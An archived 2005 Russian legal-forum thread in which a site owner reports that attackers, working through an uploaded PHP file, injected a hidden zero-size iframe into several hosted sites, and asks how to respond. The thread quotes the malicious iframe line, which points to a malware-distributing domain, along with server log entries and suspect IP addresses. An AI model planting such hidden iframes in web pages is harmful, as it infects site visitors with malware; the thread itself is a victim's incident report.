Форум ''Интернет и Право''
11 Декабря 2024, 14:51:31 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.

Войти
Новости: Форум "Интернет и Право" прекратил свою работу с 01 января 2013 г.
 
   Начало   Помощь Поиск Войти Регистрация  
В закладки:
Страниц: [1]   Вниз
  Печать  
Автор Тема: Хюлюганы  (Прочитано 3689 раз)
Dimon
Участник
**
Офлайн Офлайн

Сообщений: 802


No comments


« : 20 Мая 2005, 01:02:34 »

Скажем так. Есть пример с такой ситуацией.

На серверах V*host есть несколько разных доменов с разным контентом (стандартная услуга почти всех хостеров).


В титульные и некоторые другие html-страницы всех этих сайтов этих доменов были внесены следующие записи:
IFRAME SRC="http://www.crazy-toolbar.com/home/Ch0ke7/" WIDTH=0 BORDER=0 HEIGHT=0></IFRAME

(первый и последний теги < и > убраны мной специально).



Понятно, что когда пользователь попадет на такую страницу, на его компьютер, извините, начает валиться много всякого д***ма. Также подменяется файл explorer.exe и т.п., и т.д.  Реально много. Я даже не сразу все вычистил.


При ознакомлении с логами. Подозрение падает на этот IP
63.148.99.234 domain.biz - [19/May/2005:19:16:58 +0400] "GET / HTTP/1.1" 200 5207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)"


Но в то же время, складывается впечатление, что люди просто напрямую знали пароль. (Вообще, ощущение такое, что строка добавлялась чуть ли не полуавтоматически, так как в разных местах разных html-страниц). Интересны мнения. А также это очередная лажа хостера или поломали чего?
Записан
Dmitry
Участник
**
Офлайн Офлайн

Пол: Мужской
Сообщений: 630


Я не юрист, и даже не сын его.


« Ответ #1 : 20 Мая 2005, 09:02:40 »

Ну, при попытке загрузить указанную вами страничку, антивирус верещит как резанный, находя несколько exploit'ов, использующих уязвимость в MS Java VM, пропатченную больше года назад, если верить описаниям. Допускаю, что могут быть и новые варианты старой заразы - не исследовал. А уж как они туда попали, черт его знает - может и поломали чего-то, может сами владельцы, может с умылом, а может быть и по халатности...
Записан

Dimon
Участник
**
Офлайн Офлайн

Сообщений: 802


No comments


« Ответ #2 : 20 Мая 2005, 10:14:55 »

Dmitry, на данный момент выяснено, как попало. На сервер каким-то образом был занесен php-файл (если нужно перешлю код приватом; также как и логи, и пр. доп. инфу). Далее все действия злоумышленниками  осуществлялись через него, включая автоматическую подмену страниц и пр.

По логам виднеются два IP. Один уже понятно чей.

Второй выдает
209.66.120.12 US UNITED STATES  - - ABOVENET COMMUNICATIONS INC

По нему бы хотелось больших подробностей.



По первому IP - он оказался IP одной из известных телеком-компаний. Соответственно, интересно, как правильно действовать раньше. Я им уже написал с просьбой зафиксировать логи и другими вопросами, etc. Но хотелось бы увидетть грамотные рекомендации и советы, что делать и как делать дальше.

Записан
Dmitry
Участник
**
Офлайн Офлайн

Пол: Мужской
Сообщений: 630


Я не юрист, и даже не сын его.


« Ответ #3 : 20 Мая 2005, 10:28:02 »

http://www.leader.ru/secure/whoiz.html?q=209.66.120.12
Записан

Страниц: [1]   Вверх
  Печать  
 
Перейти в:  

Яндекс цитирования © Антон Серго, 1998-2012. Правовая информация.
Карта сайта "Интернет и Право" (internet-law.ru).

На правах рекламы:

Произвольная ссылка:







Powered by SMF 1.1.21 | SMF © 2011, Simple Machines